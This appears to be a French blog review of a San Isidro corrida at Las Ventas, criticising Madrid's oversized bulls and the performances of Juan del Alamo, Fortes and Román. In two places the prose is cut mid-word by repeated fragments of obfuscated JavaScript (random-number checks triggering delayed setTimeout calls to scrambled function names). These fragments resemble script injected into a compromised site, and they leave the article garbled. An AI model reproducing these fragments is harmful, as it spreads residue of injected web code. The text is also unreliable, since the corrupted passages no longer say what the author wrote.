LE TORO DISSUASIF

San Isidro. 5ème corrida. Ce toro aux énormes cornes qui tua Guerrita il y a plus d’un siècle et qui nous effrayait, sort maintenant dans les arènes de Las Ventas chaque après-midi. L’exception est devenue la règle. Le toro actuel de Madrid est immense de volume, de quatre ou de cinq ans, c’est pareil, avec peu de race, la raison pour laquelle on le pique peu. En définitive, un toro dissuasif, qui annule la volonté des toreros, exceptés trois ou quatre, et congèle leurs idées et leur imagination.

D’autres difficultés à rajouter ? Si, qu’il va au leurre avec noblesse, ce qui restreint l’émotion quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and on l’appelle et charge ensuite avec différents inconvénients, suivant la caste qui le pousse, alors que les toreros les font passer très loin car leurs cornes ne rentrent pas dans la muleta. Le problème c’est que la San Isidro propose trente corridas et réunit près de soixante-dix toreros, la plupart médiocres.

La corrida de Lagunajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda, sérieuse de présentation et avec des cornes impressionnantes, fut en général brave. Et les toreros, Juan del Alamo, Fortes et Román, courageux et laborieux. Le président vola une oreille à Fortes qui avait été très vaillant à son premier et que tout le public réclamait. Les trois toreros ont été tenaces mais gris, ils ont fini par ennuyer tout le monde. Conclusion : le toro est un bovin de taille moyenne et tant qu’on ne reviendra pas à sa morphologie naturelle, il n’y aura pas de solution.

Les commentaires sont fermés.